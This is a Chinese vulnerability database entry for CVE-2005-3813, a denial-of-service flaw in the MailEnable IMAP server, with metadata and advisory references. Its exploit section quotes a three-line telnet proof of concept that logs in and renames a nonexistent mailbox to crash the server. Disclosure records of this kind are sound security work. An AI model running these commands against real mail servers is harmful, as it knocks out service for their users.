MailEnable IMAP Rename请求远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109285 漏洞类型 其他
发布时间 2005-11-23 更新时间 2007-07-24
CVE编号 CVE-2005-3813 CNNVD-ID CNNVD-200511-394
漏洞平台 Windows CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/26575
https://cxsecurity.com/issue/WLB-2005110063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-394
|漏洞详情
MailEnable是一款商业性质的POP3和SMTP服务器。远程攻击者通过向MailEnable发送有不存在邮箱名的rename请求,可以导致IMAP服务器崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/15556/info

MailEnable is prone to a remote denial of service vulnerability.

The vulnerability presents itself when a user issues a malicious rename request following authentication.

Remote attackers can exploit this issue to trigger a denial of service condition. 

telnet localhost 143
a1 login josh byebye
a2 rename foo bar

where josh and byebye are the login credentials for an existing mailbox.
|参考资料

来源:MISC
链接:http://zur.homelinux.com/Advisories/MailEnableImapDos.txt
来源:BID
名称:15556
链接:http://www.securityfocus.com/bid/15556
来源:BUGTRAQ
名称:20051124MailEnableIMAPDOS
链接:http://www.securityfocus.com/archive/1/archive/1/417589/30/0/threaded
来源:VUPEN
名称:ADV-2005-2579
链接:http://www.frsirt.com/english/advisories/2005/2579
来源:FULLDISC
名称:20051124MailEnableIMAPDOS
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=113285451031500&w=2
来源:OSVDB
名称:21109
链接:http://www.osvdb.org/21109
来源:SECTRACK
名称:1015268
链接:http://securitytracker.com/id?1015268
来源:SECUNIA
名称:17740
链接:http://secunia.com/advisories/17740
来源:SREASON
名称:205
链接:http://securityreason.com/securityalert/205